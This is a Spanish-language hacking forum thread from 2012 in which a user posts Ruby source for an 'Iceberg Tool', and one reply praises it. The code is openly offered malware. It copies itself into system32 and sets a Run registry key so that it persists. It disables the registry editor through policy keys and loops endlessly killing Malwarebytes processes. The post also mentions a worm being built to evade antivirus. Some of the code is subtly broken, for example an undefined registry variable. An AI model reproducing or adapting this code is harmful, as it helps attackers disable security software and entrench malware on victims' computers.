comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Ruby] Iceberg Tool - Sanko

  • 1 Respuestas
  • 1320 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« en: Octubre 16, 2012, 05:34:46 pm »
Para recordar viejos tiempos , pasar un buen rato y practicar un poco he codeado un ejemplo de iceberg asi como el version publica que se publico hace un (mucho) tiempo.

Advertencia : Esta version del Iceberg es una SIMPLE TRADUCCION de Iceberg Tool Generator Public Version
Lo que significa que no es capaz de evadir a los Antivirus mas actualizados asi como Kaspersky o Nod 32
Para evadirlos existe el Iceberg worm que estan desarrollando Velario y Slore -> You are not allowed to view links. Register or Login

Código: Ruby
  1. ############################################################################################################
  2. #                                                                                                          #
  3. # Iceberg Tool Ruby Version  -  Using Malwarebytes like example...                                                                                                                                                 #
  4. # Coded by Sanko                                                                                                                                                                                   #
  5. # Advertencia : Esta version del Iceberg es una SIMPLE TRADUCCION de Iceberg Tool Generator Public Version #
  6. # Lo que significa que no es capaz de evadir a los Antivirus mas actualizados asi como Kaspersky o Nod 32  #
  7. # Para evadirlos existe el Iceberg worm que estan desarrollando Velario y Slore -> IcebergWorm.es          #
  8. #                                                                                                          #
  9. ############################################################################################################
  10.  
  11. require "win32ole"
  12. require 'win32/registry'
  13. require 'ftools'
  14.  
  15. def killprocess(process)
  16.         require "win32ole"
  17.     var = WIN32OLE.connect("winmgmts://")
  18.     kill = var.ExecQuery("select * from Win32_process where name='#{process}'")
  19.     kill.each do |proceso|
  20.         proceso.Terminate
  21.     end
  22. end
  23.  
  24. def deshabilitarreg()
  25.         system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /F')
  26. end
  27.  
  28. def deshabilitartaskman()
  29.         system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /F')
  30. end
  31.  
  32. def autocopy()
  33.         File.copy('Iceberg.exe', 'C:\WINDOWS\system32\iceberg.exe')
  34. end
  35.  
  36. def registrar()
  37.         runrute = 'Software\Microsoft\Windows\CurrentVersion\Run'
  38.         folderkey = 'iceberg'
  39.         Win32::Registry::HKEY_CURRENT_USER.open(Run_branch , Win32::Registry::Constants::KEY_ALL_ACCESS) do |reg|
  40.                 reg[folderkey] = 'C:\WINDOWS\system32\iceberg.exe'
  41.         end
  42.         autocopy()
  43.         deshabilitarreg()
  44.         deshabilitartaskman()
  45. end
  46.  
  47. def autokill()
  48.         killprocess('mbam.exe')
  49.         killprocess('mbamgui.exe')
  50.         killprocess('mbampt.exe')
  51.         killprocess('mbamscheduler.exe')
  52.         killprocess('mbamservice.exe')
  53.         killprocess('mbam-chamaleon.exe')
  54.         killprocess('mbam-killer.exe')
  55. end
  56.  
  57. def main()
  58.         var = 0
  59.         registrar()
  60.         while var < 10
  61.                 autokill()
  62.         end
  63. end
  64.  
  65. main()

Saludos...
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Slore

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
  • OrwaySoftware
    • Ver Perfil
    • Email
  • Skype: OrwaySoftware
« Respuesta #1 en: Octubre 21, 2012, 09:59:20 am »
Veo que estas destacando ultimamente enRuby, debe de ser una satisfaccion poder codear en un leguaje bueno y no basico.

 

¿Te gustó el post? COMPARTILO!



[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1400
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro9999

Respuestas: 2
Vistas: 1377
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro9999
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 866
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro9999
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 1098
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro9999
Shoesrb donde puedes hacerle una interfaz grafica a una aplicación hecha en Ruby

Iniciado por Alejandro9999

Respuestas: 3
Vistas: 1659
Último mensaje Mayo 21, 2013, 03:51:00 am
por D4rkC0d3r